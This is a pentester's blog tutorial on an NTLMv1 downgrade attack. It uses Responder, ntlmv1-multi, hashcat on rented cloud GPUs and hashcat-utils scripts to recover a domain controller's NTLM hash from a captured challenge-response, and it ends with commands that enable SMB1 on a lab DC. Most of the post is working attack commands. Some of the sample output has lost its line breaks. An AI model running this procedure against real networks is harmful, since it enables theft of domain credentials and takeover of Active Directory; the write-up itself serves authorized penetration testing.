Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here’s my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller. Let’s start with a sample blob you’ll get out of the ntlmv1-multi tool:

Hostname: tangentUsername: TT-DC01$Challenge: 1122334455667788LM Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097NT Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097CT1: 14B8DF571CF877A8CT2: 7CEAB088CDD16386CT3: 8819D23E095B0097To Calculate final 4 characters of NTLM hash use:./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788To crack with hashcat create a file with the following contents:14B8DF571CF877A8:11223344556677887CEAB088CDD16386:1122334455667788echo "14B8DF571CF877A8:1122334455667788">>14000.hashecho "7CEAB088CDD16386:1122334455667788">>14000.hashTo crack with hashcat:./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1To Crack with crack.sh use the following tokenNTHASH:14B8DF571CF877A87CEAB088CDD163868819D23E095B0097

First, put this in a fille called 14000.hash

14B8DF571CF877A8:11223344556677887CEAB088CDD16386:1122334455667788

Now crack with vast.ai using hashcat:

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

The results will look something like this:

14B8DF571CF877A8:1122334455667788:$HEX[STRING1]7CEAB088CDD16386:1122334455667788:$HEX[STRING2]

(STRING1 and STRING2 will be needed in the next steps)

Then calculate the last 4 characters of the hash:

./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788LAST4

(I’m calling the result of this command LAST4)

Now take each hex string and run the deskey_to_ntlm.pl tool on it:

hashcat-utils/src/deskey_to_ntlm.pl STRING1PART1hashcat-utils/src/deskey_to_ntlm.pl STRING2PART2

(I’m calling the result of these commands PART1 and PART2)

Now stitch it all together:
PART1+PART2+LAST4

(Note: don’t actually include the + in stitching the strings together)

Side note: in my lab the Responder downgrade attack wouldn’t work correctly, and I eventually found out it was because my freshly installed DC didn’t support SMB1. I installed/enabled it with:

Get-WindowsOptionalFeature -Online -FeatureName SMB1ProtocolEnable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

Written by: Brian Johnson

Share on socials: